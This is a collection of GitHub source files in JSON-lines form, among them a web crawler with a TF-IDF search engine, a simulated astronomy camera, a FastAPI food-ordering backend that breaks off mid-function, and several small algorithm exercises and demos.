self._tags_to_str()\n _repr = \" \".join([_repr, tags])\n return _repr\n\n @classmethod\n def unpack_from_metric_struct(cls, mt_struct):\n _namespace = Namespace.unpack_from_nm_struct(mt_struct.namespace.contents)\n _desc = mt_struct.description.decode(encoding=\"utf-8\")\n _value, _unit = unpack_value_t(mt_struct.value)\n _time = ctimewithns_to_time(mt_struct.timestamp)\n 
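# flatten the C map of tags into a plain Python dict (via the cmap_to_dict helper imported above)\n        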
_tags = cmap_to_dict(mt_struct.tags)\n return cls(\n _namespace,\n _desc,\n _value,\n _unit,\n _time,\n _tags,\n )\n","repo_name":"solarwinds/snap-plugin-lib","sub_path":"v2/bindings/python/swisnap_plugin_lib_py/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"1659539406","text":"import collections\nimport sys\nsys.stdin = open('input.txt')\ninput = sys.stdin.readline\n\n\ndef bfs():\n cnt = 0\n steps = 0\n q = collections.deque()\n q.append((P, 0))\n while q:\n pos, step = q.popleft()\n if visit[pos] == 1:\n continue\n else:\n if pos <= S:\n cnt += 1\n steps += step\n if cnt == 2:\n return steps\n visit[pos] = 1\n\n for v in graph[pos]:\n q.append((v, step+1))\n\n\nN, S, P = map(int, input().split())\ngraph = [[] for _ in range(N+1)]\nvisit = [0]*(N+1)\nfor _ in range(N-1):\n A, B = map(int, input().split())\n graph[A].append(B)\n graph[B].append(A)\n\nans = N - bfs() - 1\nprint(ans)\n","repo_name":"mintropy/algorithm_pulzo","sub_path":"윤효전/210826/21738.py","file_name":"21738.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"43873948728","text":"f = open(\"26.txt\")\ncubes = []\nfor i in f:\n size, color = i.split()\n size = int(size)\n cubes.append([size, color])\ncubes.sort(reverse=1)\n\nsklad = []\nwhile len(cubes) > 0:\n block = [cubes.pop(0)]\n for i in range(len(cubes)):\n if cubes[i][1] != block[-1][1] and block[-1][0] - cubes[i][0] >= 5:\n block.append(cubes[i])\n cubes[i] = \"\"\n cubes = [x for x in cubes if x != \"\"]\n sklad.append(block)\nprint(max(len(x) for x in sklad), len(sklad))\n","repo_name":"foblako/Statgrad2","sub_path":"26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31131967663","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 9 15:48:17 2013\n\nIt should work. Some parts of code need to be rewritten in a more pythonic way.\nIt takes up to 8 minutes to download 1997 descriptions. It takes 2 more minutes\nto build the Inverted Index and 3 more minutes to build the Doc Weight Matrix.\n\nI'm using the most popular app in the US to avoid having descriptions with\noriental characters. Let me know what do you think. If there is too much\n\"black magic\" just ask me any question.\n\nC ya :-)\n\n@author: Seby\n\"\"\"\n\nfrom __future__ import division, print_function\nimport sys\nimport os\nimport nltk, re, pprint, math, operator, time, threading, urllib2\nfrom os.path import dirname, join\nfrom itertools import chain\n\ndef map_async(function, args, threads=10):\n\t'''\n\tSimulates built-in `map` function. 
Each call is asynchronous\n\tusing a thread pool with a variable number of threads\n\t'''\n\tdef wrap():\n\t\twhile(1):\n\t\t\ttry:\n\t\t\t\tlock.acquire()\n\t\t\t\tparam = args_copy.pop()\n\t\t\texcept:\n\t\t\t\treturn\n\t\t\tfinally:\n\t\t\t\tlock.release()\n\n\t\t\ttry:\n\t\t\t\tresult = function(param)\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\t\t\t\treturn\n\n\t\t\ttry:\n\t\t\t\tlock.acquire()\n\t\t\t\tres.append(result)\n\t\t\texcept:\n\t\t\t\treturn\n\t\t\tfinally:\n\t\t\t\tlock.release()\n\n\tlock = threading.Lock()\n\targs_copy = list(args)\n\tthreads = [threading.Thread(target=wrap) for i in range(threads)]\n\tres = []\n\n\tfor thread in threads: thread.start()\n\tfor thread in threads: thread.join()\n\n\treturn res\n\n\n#==============================================================================\n# Step1: App crawling\n# You will access the app websites such as Google Play (https://play.google.com\n# /store) and AppBrain (http://www.appbrain.com/) to obtain the desired\n# description texts for the apps. There is no constraint on which kind of\n# apps you choose. The number of apps should not be less than\n# 1000. Store the description text in the files.\n#==============================================================================\n\ncategories = [\n\"business\",\n\"comics\",\n\"communication\",\n\"education\",\n\"entertainment\",\n\"finance\",\n\"health-and-fitness\",\n\"medical\",\n\"sports\"\n]\n\nROOT = join(dirname(__file__), \"apps-descs\")\n\n#==============================================================================\n# Open a web page\n#==============================================================================\n\ndef open_web_page(url):\n\topener = urllib2.build_opener()\n\t# without the following line I don't get any response\n\t# with it, I get some HTTP 500\n\topener.addheaders = [('User-agent', 'Mozilla/19.0')]\n\tresponse = opener.open(url)\n\tpage = response.read()\n\topener.close()\n\treturn page\n\n#==============================================================================\n# Searching all the URLs from a generic page leading to an App\n#==============================================================================\n\ndef get_app_urls(url):\n\turls=[]\n\tprint(\"Parsing {0}\".format(url))\n\n\tfor i in range(30): #black magic:\n\t\tpage = open_web_page(url)\n\t\tm = re.findall('<a href=\\\"\\/app\\/(.*?)\\\" class',page)\n\t\tif len(m) > 0:\n\t\t\tbreak\n\t\ttime.sleep(5)\n\n\tfor t in m:\n\t\turls.append(\"http://www.appbrain.com/app/\"+t)\n\t\tprint(\".\",end=\"\")\n\treturn urls\n\n#==============================================================================\n# Searching the description of the App\n#==============================================================================\npatTitle = re.compile('h1 itemprop=\\\"name\\\".*?>(.*?)<',\n\t\t\t\t      re.U|re.L|re.M|re.I|re.S)\npatDescr = re.compile('itemprop=\\\"description\\\".*?>(.*?)</div',\n\t\t\t\t      re.U|re.L|re.M|re.I|re.S)\npatClean = re.compile('<a.*?/a>|&[\\w]+;|\\\\[tn]|<[^<]+?>',\n\t\t\t\t      re.U|re.L|re.M|re.I|re.S)\npatAdult = re.compile('violates the Android market guidelines',\n\t\t\t\t      re.U|re.L|re.M|re.I|re.S)\n\n# This will return the title and the description of the app\ndef get_app_descs(args):\n\ti, url = args\n\n\tfor j in range(30): # more black magic\n\t\tpage = open_web_page(url)\n\t\tm = \"\".join(patDescr.findall(page))\n\n\t\tif len(m) > 0:\n\t\t\tbreak\n\t\tif j > 10:\n\t\t\tw = \"\".join(patAdult.findall(page))\n\t\t\tif len(w) > 
0:\n\t\t\t\tbreak\n\t\ttime.sleep(5)\n\n\tm = patClean.sub(\" \", m)\n\tdescr = \"\".join(patTitle.findall(page)) + \"\\n\\n\" + m\n\n\tfilename = \"App{0!s}.txt\".format(i)\n\tf = open(join(ROOT, filename), \"w\")\n\tf.write(descr)\n\tf.close()\n\n\treturn descr\n\n\n#==============================================================================\n# Loading Data\n#==============================================================================\ndescriptions = {}\n\nif not os.path.exists(ROOT) :\n\n\tprint(\"Creating folder\")\n\tos.mkdir(ROOT)\n\n\tprint(\"Downloading descriptions\")\n\tprint(\"--- Getting URLs\")\n\n\tapp_urls = []\n\tthrds = []\n\n\tcategory_urls = []\n\n\tfor s in categories:\n\t\tfor i in range(0,200,10):\n\t\t\tcategory_urls.append(\"http://www.appbrain.com/apps/country-united-states/{0}/?o={1!s}\".format(s, i))\n\n\tapp_urls = map_async(get_app_urls, category_urls) # extract app urls from page at category_urls\n\tapp_urls = list(chain(*app_urls)) # flatten 2D list into 1D list\n\n\tprint(\"\\n\\n{0!s} URLs collected\\n--- Getting descriptions\".format(len(app_urls)))\n\n\tapp_descs = map_async(get_app_descs, enumerate(app_urls))\n\tprint(\"Finished collecting application descriptions {}/{}\".format(len(app_descs), len(app_urls)))\n\n\tdescriptions = dict(enumerate(app_descs)) # I know ...\n\nelse:\n\tprint(\"The descriptions have already been downloaded\")\n\tprint(\"--- Loading files\")\n\n\tfor filename in os.listdir(ROOT):\n\t\tif filename.startswith(\"App\"):\n\t\t\tf = open(join(ROOT, filename), \"r\")\n\t\t\ti = re.match(\"App(\\d+).txt\", filename)\n\t\t\tdescriptions[int(i.group(1))] = f.read()\n\t\t\tf.close()\n\t\t\tprint(\".\", end=\"\")\n\n#==============================================================================\n# Step2: Index construction\n# Build inverted index on the texts. You will use NLTK to preprocess the text,\n# such as tokenizing, normalizing, etc. Compute and store tf, df in the\n# inverted index.\n#==============================================================================\n\n\n#==============================================================================\n# tokenizing & normalizing (lower case + lemmatizing)\n#==============================================================================\n\ndocuments={}\nwnl = nltk.WordNetLemmatizer()\nfor key in descriptions:\n\tdocuments[key]= map(\n\twnl.lemmatize,(nltk.word_tokenize(re.sub(\"\\W\",\" \",descriptions[key].lower()))))\n\n#==============================================================================\n# tf = number of times that t occurs in d\n#==============================================================================\n# df = number of documents in the collection that the term occurs in\n#==============================================================================\n# inverted index = For each term t, we store a list of all documents that\n# contains t.\n#==============================================================================\n\n\n#==============================================================================\n# creating a list containing the unique words in the documents\n#==============================================================================\n\nkeywords = list(set(chain(*documents.values())))\n\n#==============================================================================\n# Creating the Inverted Index:\n#\n# An element of invInd is: 'term':[df,{IndexDoc1:tf,IndexDoc2:tf,...}]\n# Ex. 
'student':[3,{10:1, 43:2, 1345:1}]'\n#==============================================================================\n\ndef buildInvIndex(keywords, documents):\n\tprint(\"\\n--- Building Inverted Index\")\n\tinvInd = {}\n\tfor k in keywords:\n\t\td = {}\n\t\tfor key in documents.iterkeys():\n\t\t\tif k in documents[key]:\n\t\t\t\td[key]=documents[key].count(k)\n\t\tinvInd[k]=[len(d.keys()),d]\n\treturn invInd\n\ninvInd = buildInvIndex(keywords,documents)\n\n#==============================================================================\n# Step3: Query processing\n# Vector space model. The input parameter is the set of keywords and integer k,\n# for top-k query answering. The query processor should compute the\n# vector space similarities of the query to the documents. Top-k documents\n# are returned according to the ranked similarity values.\n#==============================================================================\n\n\n#==============================================================================\n# Function that creates the document weight matrix\n#\n# w = tf*idf = (1+log(tf))*(log(N/df))\n#==============================================================================\n\ndef buildDocWeightMatrix(keywords,documents,invInd):\n\tprint(\"\\n--- Building Doc Weight Matrix\\n\")\n\tN = len(documents)\n\twMatrix = []\n\ts = sorted(documents.keys())\n\tfor key in s:\n\t\twMatrixRow = []\n\t\tfor k in keywords:\n\t\t\ttry:\n\t\t\t\ttf = invInd[k][1][key]\n\t\t\texcept KeyError:\n\t\t\t\ttf = 0\n\t\t\tif tf > 0:\n\t\t\t\ttf = (1+math.log(tf,10))\n\t\t\tidf = math.log(N/invInd[k][0],10)\n\t\t\twMatrixRow.append(tf*idf)\n\t\twMatrix.append(wMatrixRow)\n\n# vector normalization\n\tl = len(wMatrix)\n\tfor i in range(l):\n\t\tsomma = sum(x**2 for x in wMatrix[i])\n\t\tradice = math.sqrt(somma)\n\t\tif radice > 0:\n\t\t\t(wMatrix[i]) = [x/radice for x in wMatrix[i]]\n\treturn wMatrix\n\n#==============================================================================\n# Function that creates the query vector representation\n#\n# w = tf*idf\n#\n# tf = 1 if the user keyword is in our keywords 0 otherwise\n#==============================================================================\n\ndef buildQueryVector(query,keywords,documents,invInd):\n\tuserKeywords = map(\n\twnl.lemmatize,(nltk.word_tokenize(re.sub(\"\\W\",\" \",query.lower()))))\n\n\tN = len(documents)\n\tvector = []\n\tfor k in keywords:\n\t\tidf = 0;\n\t\ttf = 0;\n\t\tif k in userKeywords:\n\t\t\ttf = 1\n\t\t\tdf = invInd[k][0]\n\t\t\tif df > 0:\n\t\t\t\tidf = math.log(N/df,10)\n\t\tw = tf*idf\n\t\tvector.append(w)\n\treturn vector\n\n#==============================================================================\n# Distance\n#==============================================================================\n\ndef computeDistance(v1,v2):\n\treturn sum([a*b for a,b in zip(v1,v2)])\n\n#==============================================================================\n# Execute Query\n#==============================================================================\n\ndef queryExec(queryVector,wMatrix,k):\n\tresults = {}\n\tl = len(wMatrix)\n\tfor i in range(l):\n\t\tresults[\"App \"+str(sorted(documents.keys())[i])] = computeDistance(\n\t\tqueryVector,wMatrix[i])\n\n\tsorted_results = sorted(results.iteritems(), key=operator.itemgetter(1),\n\t\t\t\t\t\t\treverse=True)\n\tpprint.pprint(sorted_results[:k])\n\n#==============================================================================\n# Reading 
Input\n#==============================================================================\nwMatrix = buildDocWeightMatrix(keywords,documents,invInd)\n\nwhile 1:\n\tquery = raw_input(\"Insert a set of keywords (empty for exit): \")\n\tif not query:\n\t\tprint(\"Quitting\")\n\t\tsys.exit(0)\n\ttry:\n\t\tk=input('Max n. of results:')\n\t\tqueryVector = buildQueryVector(query,keywords,documents,invInd)\n\t\tprint(\"\")\n\t\tqueryExec(queryVector, wMatrix, k)\n\t\tprint(\"\")\n\texcept ValueError:\n\t\tprint (\"Not a number\")\n\t\tprint(\"\")\n","repo_name":"katomaso/LiU-TextMining","sub_path":"Lab4 Final/Old Versions/lab4-mt2.py","file_name":"lab4-mt2.py","file_ext":"py","file_size_in_byte":11055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74546449012","text":"class Solution(object):\n def removeDuplicates(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n for i in range(len(nums) - 1)[::-1]:\n if nums[i] == nums[i + 1]:\n nums.pop(i)\n\n\nInput = [1,1,2,3,3,3,4]\n\nA = Solution()\nB = A.removeDuplicates(Input)\nprint(B)","repo_name":"yuzhenbo/leetcode","sub_path":"leetcode/standard/26_RemoveDuplicationsfromSortedArray.py","file_name":"26_RemoveDuplicationsfromSortedArray.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18787611285","text":"from math import cos, pi, sin\nfrom pycat.core import Color, Sprite, Window\nfrom pycat.geometry.point import Point\n\nw = Window(width=800, height=600, is_sharp_pixel_scaling=True)\n\n\nclass ResizeColorSprite(Sprite):\n\n def on_create(self):\n self.time = 0\n self.color = Color.MAGENTA\n self.position = w.center\n\n def on_update(self, dt):\n self.rotation += 1\n self.time += dt\n self.width = 200 * sin(self.time/2)\n self.height = 200 * cos(2*pi*sin(self.time/10))\n\n def on_left_click(self):\n self.set_random_color()\n\n\nclass SharpPixelSprite(Sprite):\n\n def on_create(self):\n self.image = \"img/pixelish.png\"\n self.scale_to_width(w.width)\n self.position = Point(self.width, self.height)/2\n layer = -1\n\n\nw.create_sprite(SharpPixelSprite)\nw.create_sprite(ResizeColorSprite)\n\nw.run()\n","repo_name":"cmorace/pycat","sub_path":"pycat/test/resize_test.py","file_name":"resize_test.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"73554431093","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom . 
import views\n\n# All URLs that are part of the GibJohn Tutoring Web Application\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('account/', include('Users.urls')),\n path('course/', include('Courses.urls')),\n path('', views.index, name=\"index\"),\n path('about/', views.about, name=\"about\"),\n path('contact/', views.contact, name=\"contact\"),\n path('privacy-policy/', views.policy, name=\"policy\"),\n]\n","repo_name":"MatthewPalmer15/GibJohnTutoring","sub_path":"GibJohnTutoring/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6502109600","text":"from __future__ import annotations\n\nimport glob\nimport numpy as np\nimport astropy.units as u\nfrom astropy.table import Table\nfrom astropy.time import Time\nfrom typing import Tuple, TYPE_CHECKING, Optional, Any, cast\nfrom astropy.wcs import WCS\nfrom astropy.io import fits\nfrom numpy.typing import NDArray\nfrom photutils.datasets import make_gaussian_sources_image\nfrom photutils.datasets import make_noise_image\nimport logging\n\nfrom pyobs.object import Object\nfrom pyobs.utils.enums import ImageFormat\nfrom pyobs.images import Image\n\nif TYPE_CHECKING:\n from pyobs.utils.simulation import SimWorld\n\n\nlog = logging.getLogger(__name__)\n\n\nclass SimCamera(Object):\n \"\"\"A simulated camera.\"\"\"\n\n __module__ = \"pyobs.utils.simulation\"\n\n def __init__(\n self,\n world: \"SimWorld\",\n image_size: Optional[Tuple[int, int]] = None,\n pixel_size: float = 0.015,\n images: Optional[str] = None,\n max_mag: float = 20.0,\n seeing: float = 3.0,\n **kwargs: Any,\n ):\n \"\"\"Inits a new camera.\n\n Args:\n world: World to use.\n image_size: Size of image.\n pixel_size: Square pixel size in mm.\n images: Filename pattern (e.g. 
/path/to/*.fits) for files to return instead of simulated images.\n max_mag: Maximum magnitude for sim.\n seeing: Seeing in arcsec.\n \"\"\"\n Object.__init__(self, **kwargs)\n\n # store\n self.world = world\n self.telescope = world.telescope\n self.full_frame: Tuple[int, int, int, int] = (\n (0, 0, image_size[0], image_size[1]) if image_size is not None else (0, 0, 512, 512)\n )\n self.window = self.full_frame\n self.binning = (1, 1)\n self.pixel_size = pixel_size\n self.image_format = ImageFormat.INT16\n self.images = (\n [] if images is None else sorted(glob.glob(images)) if \"*\" in images or \"?\" in images else [images]\n )\n self._max_mag = max_mag\n self._seeing = seeing\n\n # private stuff\n self._catalog = None\n self._catalog_coords = None\n\n def get_image(self, exp_time: float, open_shutter: bool) -> Image:\n \"\"\"Simulate an image.\n\n Args:\n exp_time: Exposure time in seconds.\n open_shutter: Whether the shutter is opened.\n\n Returns:\n numpy array with image.\n \"\"\"\n\n # get now\n now = Time.now()\n\n # simulate or what?\n if self.images:\n # take image from list\n filename = self.images.pop(0)\n data = fits.getdata(filename)\n self.images.append(filename)\n\n else:\n # simulate\n data = self._simulate_image(exp_time, open_shutter)\n\n # create header\n hdr = self._create_header(exp_time, open_shutter, now, data)\n\n # return it\n return Image(data, header=hdr)\n\n def _simulate_image(self, exp_time: float, open_shutter: bool) -> NDArray[Any]:\n \"\"\"Simulate an image.\n\n Args:\n exp_time: Exposure time in seconds.\n open_shutter: Whether the shutter is opened.\n\n Returns:\n numpy array with image.\n \"\"\"\n\n # get shape for image\n shape = (int(self.window[3]), int(self.window[2]))\n\n # create image with Gaussian noise for BIAS\n data = make_noise_image(shape, distribution=\"gaussian\", mean=10, stddev=1.0)\n\n # non-zero exposure time?\n if exp_time > 0:\n # add DARK\n data += make_noise_image(shape, distribution=\"gaussian\", mean=exp_time / 1e4, stddev=exp_time / 1e5)\n\n # add stars and stuff\n if open_shutter:\n # get solar altitude\n sun_alt = self.world.sun_alt\n\n # get mean flatfield counts\n flat_counts = 30000 / np.exp(-1.28 * (4.209 + sun_alt)) * exp_time\n\n # create flat\n data += make_noise_image(shape, distribution=\"gaussian\", mean=flat_counts, stddev=flat_counts / 10.0)\n\n # get catalog with sources\n sources = self._get_sources_table(exp_time)\n\n # filter out all sources outside FoV\n sources = sources[\n (sources[\"x_mean\"] > 0)\n & (sources[\"x_mean\"] < shape[1])\n & (sources[\"y_mean\"] > 0)\n & (sources[\"y_mean\"] < shape[0])\n ]\n\n # create image\n data += make_gaussian_sources_image(shape, sources)\n\n # saturate\n data[data > 65535] = 65535\n\n # finished\n return cast(NDArray[Any], data).astype(np.uint16)\n\n def _create_header(self, exp_time: float, open_shutter: float, time: Time, data: NDArray[Any]) -> fits.Header:\n # create header\n hdr = fits.Header()\n hdr[\"NAXIS1\"] = data.shape[1]\n hdr[\"NAXIS2\"] = data.shape[0]\n\n # set values\n hdr[\"DATE-OBS\"] = (time.isot, \"Date and time of start of exposure\")\n hdr[\"EXPTIME\"] = (exp_time, \"Exposure time [s]\")\n\n # binning\n hdr[\"XBINNING\"] = hdr[\"DET-BIN1\"] = (int(self.binning[0]), \"Binning factor used on X axis\")\n hdr[\"YBINNING\"] = hdr[\"DET-BIN2\"] = (int(self.binning[1]), \"Binning factor used on Y axis\")\n\n # window\n hdr[\"XORGSUBF\"] = (int(self.window[0]), \"Subframe origin on X axis\")\n hdr[\"YORGSUBF\"] = (int(self.window[1]), \"Subframe origin on 
Y axis\")\n\n # statistics\n hdr[\"DATAMIN\"] = (float(np.min(data)), \"Minimum data value\")\n hdr[\"DATAMAX\"] = (float(np.max(data)), \"Maximum data value\")\n hdr[\"DATAMEAN\"] = (float(np.mean(data)), \"Mean data value\")\n\n # hardware\n hdr[\"TEL-FOCL\"] = (self.telescope.focal_length, \"Focal length [mm]\")\n hdr[\"DET-PIXL\"] = (self.pixel_size, \"Size of detector pixels (square) [mm]\")\n\n # finished\n return hdr\n\n def _get_catalog(self, fov: float) -> Table:\n \"\"\"Returns GAIA catalog for current telescope coordinates.\"\"\"\n # get catalog\n if self._catalog_coords is None or self._catalog_coords.separation(self.telescope.real_pos) > 10.0 * u.arcmin:\n from astroquery.utils.tap import TapPlus\n\n # get coordinates\n coords = self.telescope.real_pos\n\n # query TAP\n tap = TapPlus(url=\"https://gea.esac.esa.int/tap-server/tap\")\n query = self._get_gaia_query(coords.ra.degree, coords.dec.degree, fov * 1.5)\n job = tap.launch_job(query)\n\n # get result table\n self._catalog = job.get_results()\n\n return self._catalog\n\n def _get_gaia_query(self, ra: float, dec: float, radius: float) -> str:\n # define query\n return f\"\"\"\n SELECT\n TOP 1000\n DISTANCE(\n POINT('ICRS', ra, dec),\n POINT('ICRS', {ra}, {dec})\n ) as dist,\n ra, dec, phot_g_mean_flux, phot_g_mean_mag\n FROM\n gaiadr2.gaia_source\n WHERE\n 1 = CONTAINS(\n POINT('ICRS', ra, dec),\n CIRCLE('ICRS', {ra}, {dec}, {radius})\n )\n AND phot_g_mean_mag < {self._max_mag}\n ORDER BY\n phot_g_mean_mag ASC\n \"\"\"\n\n def _get_sources_table(self, exp_time: float) -> Table:\n \"\"\"Create sources table.\"\"\"\n\n # calculate cdelt1/2\n tmp = 360.0 / (2.0 * np.pi) * self.pixel_size / self.telescope.focal_length\n cdelt1, cdelt2 = tmp * self.binning[0], tmp * self.binning[1]\n log.info(\n \"Plate scale is %.2f\\\"/px, image size is %.2f'x%.2f'.\",\n cdelt1 * 3600,\n cdelt1 * 60 * self.window[2],\n cdelt2 * 60 * self.window[3],\n )\n\n # FoV\n fov = np.max(cdelt2 * np.array(self.full_frame[2:]))\n\n # get catalog\n cat = self._get_catalog(fov)\n\n # create WCS\n w = WCS(naxis=2)\n w.wcs.crpix = [self.window[3] / 2.0, self.window[2] / 2.0]\n w.wcs.cdelt = np.array([-cdelt1, cdelt2])\n w.wcs.crval = [self.telescope.real_pos.ra.degree, self.telescope.real_pos.dec.degree]\n w.wcs.ctype = [\"RA---TAN\", \"DEC--TAN\"]\n\n # set sigma to given seeing (in FWHM) in pixels\n fwhm = self._seeing / 3600.0 / cdelt1 / 2.3548\n\n # convert world to pixel coordinates\n cat[\"x\"], cat[\"y\"] = w.wcs_world2pix(cat[\"ra\"], cat[\"dec\"], 0)\n\n # get columns\n sources = cat[\"x\", \"y\", \"phot_g_mean_flux\", \"phot_g_mean_mag\"]\n sources.rename_columns([\"x\", \"y\", \"phot_g_mean_flux\"], [\"x_mean\", \"y_mean\", \"flux\"])\n sources.add_column([fwhm] * len(sources), name=\"x_stddev\")\n sources.add_column([fwhm] * len(sources), name=\"y_stddev\")\n sources[\"flux\"] *= exp_time\n\n \"\"\"\n table['amplitude'] = [50, 70, 150, 210]\n table['x_mean'] = [160, 25, 150, 90]\n table['y_mean'] = [70, 40, 25, 60]\n table['x_stddev'] = [15.2, 5.1, 3., 8.1]\n table['y_stddev'] = [2.6, 2.5, 3., 4.7]\n table['theta'] = np.radians(np.array([145., 20., 0., 60.]))\n \"\"\"\n\n # finished\n return sources\n\n\n__all__ = [\"SimCamera\"]\n","repo_name":"pyobs/pyobs-core","sub_path":"pyobs/utils/simulation/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":9339,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"34606939082","text":"from fastapi import APIRouter\nfrom 
app.config.db import client\nfrom app.schemas.user import User, Order\nfrom bson import ObjectId\n# from app.schemas.user import Order, ItemInOrder\nfrom app.schemas.restaurant import Item\nfrom app.schemas.user import ItemRequest\nfrom app.schemas.user import Reviews\nfrom app.schemas.user import Blocked\nfrom app.schemas.user import Reported\nfrom app.auth.provider import oauth2_scheme, get_password_hash, verify_password, create_access_token, return_user\nfrom app.schemas.user import OrderPlaced, Completed\n\n\nrouter = APIRouter()\n\n\n@router.get('/')\nasync def path1():\n return {\"message\": \"User Endpoint\"}\n\n\n@router.get('/locations')\nasync def location():\n\n rest_table = client[\"SEProject\"][\"Restaurant\"]\n locations = rest_table.find({})\n locations_list = []\n for location in locations:\n for rest in rest_table:\n locations_list.append(\n {\"restaurantLocation\": rest[\"location\"], \"restaurantName\": rest[\"location\"]})\n\n return {\n \"location\": \"Location Endpoint\"\n }\n\n\n@router.get('/all-locations')\nasync def all_locations():\n location_table = client[\"SEProject\"][\"Location\"]\n locations = location_table.find({})\n locations_list = []\n for location in locations:\n locations_list.append({\"location_name\": location[\"location_name\"]})\n\n return {\n \"all-locations\": locations_list\n }\n\n\n@router.get('/displayitems/{location_name}')\n# this funtion is for the khareedar landing screen where all the restaurants are being displayed\nasync def displayitems(location_name: str):\n items_table = client[\"SEProject\"][\"Item\"]\n items_data = items_table.find({\"item_location\": location_name})\n\n # Construct the list of items to return\n items = []\n for item in items_data:\n items.append({\"item_name\": item[\"item_name\"], \"item_id\":str(item[\"_id\"]) , \"item_price\": item[\"item_price\"],\n \"item_location\": item[\"item_location\"], \"item_desription\": item[\"item_description\"]})\n\n return {\n \"displayItems\": items\n }\n\n\n@router.post('/place-order')\nasync def place_order(order: Order):\n order_table = client[\"SEProject\"][\"Order\"]\n total_price = 0\n # Convert list of ItemInCart to list of dicts\n order_items = [dict(item) for item in order.items]\n for item in order.items:\n total_price += item.item_price * item.quantity\n\n user_table = client[\"SEProject\"][\"User\"]\n # find the number of the user in the user_table\n user = user_table.find_one({\"email\": order.order_email})\n user_number = user[\"number\"]\n\n order_table.insert_one({\"items\": order_items, \"gender_preference\": order.gender_preference,\n \"partial_order\": order.partial_order, \"total_price\": total_price, \"accepted\": 0, \"order_location\": order_items[0][\"item_location\"] , \"order_email\": order.order_email , \"order_number\" : user_number, \"delivery_location\" : order.delivery_location})\n\n return {\"message\": \"Order Placed\"}\n\n# .................................. 
DOST ..................................\n\n# dispay all orders\n\n\n@router.get('/display-orders/{my_email}')\nasync def display_orders(my_email: str):\n order_table = client['SEProject'][\"Order\"]\n user_table = client[\"SEProject\"][\"User\"]\n me_user = user_table.find_one({\"email\": my_email})\n my_gender = me_user[\"gender\"]\n orders_of_my_gender = order_table.find(\n {\"accepted\": 0, \"gender_preference\": my_gender})\n \n orders_of_none_gender = order_table.find(\n {\"accepted\": 0, \"gender_preference\": \"None\"})\n \n orders_list = []\n\n blocked_table = client[\"SEProject\"][\"Blocked\"]\n me_blocked_users = blocked_table.find({\"blockee_email\": my_email})\n my_blocked_users = blocked_table.find({\"blocker_email\": my_email})\n me_blocked_users = [user[\"blocker_email\"] for user in me_blocked_users]\n my_blocked_users = [user[\"blockee_email\"] for user in my_blocked_users]\n\n me_blocked_users.extend(my_blocked_users)\n print(me_blocked_users)\n\n\n orders_list = [dict(ordr) for ordr in orders_of_my_gender]\n orders_list2 = [dict(ordr) for ordr in orders_of_none_gender]\n orders_list.extend(orders_list2)\n returning_list = []\n for order in orders_list:\n if order[\"order_email\"] not in me_blocked_users:\n returning_list.append({\"items\": order[\"items\"], \"gender_preference\": order[\"gender_preference\"],\n \"partial_order\": order[\"partial_order\"], \"total_price\": order[\"total_price\"], \"accepted\": 0, \"order_location\": order[\"order_location\"] , \"order_id\" : str(order[\"_id\"]) , \"order_number\" : order[\"order_number\"] , \"order_email\" : order[\"order_email\"], \"delivery_location\" : order[\"delivery_location\"]})\n \n print(returning_list)\n\n return {\n \"orders\": returning_list\n }\n\n\n@router.put('/accept-order')\nasync def accept_order(order_detail: OrderPlaced):\n order_table = client[\"SEProject\"][\"Order\"]\n order_table.update_one({\"_id\": ObjectId(order_detail.order_id)}, {\"$set\": {\"accepted\": 1}})\n\n accepted_order_table = client[\"SEProject\"][\"OrderPlaced\"]\n accepted_order_table.insert_one({\"order_id\": order_detail.order_id, \"dost_email\": order_detail.dost_email, \"khareedar_email\": order_detail.khareedar_email})\n \n return {\"message\": \"Order Accepted\"}\n\n@router.get(\"/get-order-detail/{order_id}\")\nasync def get_order_id(order_id: str):\n order_table = client[\"SEProject\"][\"Order\"]\n order = order_table.find_one({\"_id\": ObjectId(order_id)})\n order[\"_id\"] = str(order[\"_id\"])\n\n return {\"order\": order}\n\n\n\n\n@router.post('/request-item')\nasync def request_item(item: ItemRequest):\n request_table = client[\"SEProject\"][\"ItemRequest\"]\n request_table.insert_one({\"item_name\": item.item_name, \"item_location\": item.item_location, \"accepted\": 0 , \"requester_email\" : item.requester_email})\n \n return {\"message\": \"Item Requested\"}\n\n@router.post('/user-review/{my_email}')\nasync def user_review(review: Reviews):\n review_table = client[\"SEProject\"][\"Review\"]\n review_table.insert_one({\"reviewer_email\": review.reviewer_email, \"reviewee_email\": review.reviewee_email, \"review\": review.review, \"rating\": review.rating})\n return {\"message\": \"Review Added\"}\n\n@router.get('/my-reviews/{my_email}')\nasync def my_reviews(my_email: str):\n review_table = client[\"SEProject\"][\"Review\"]\n reviews = review_table.find({\"reviewee_email\": my_email})\n # reviews_list = [dict(review) for review in reviews]\n reviews_list = []\n for rev in reviews:\n rev[\"_id\"] = str(rev[\"_id\"])\n 
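# the str() above is needed because Mongo's ObjectId is not JSON-serializable\n        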
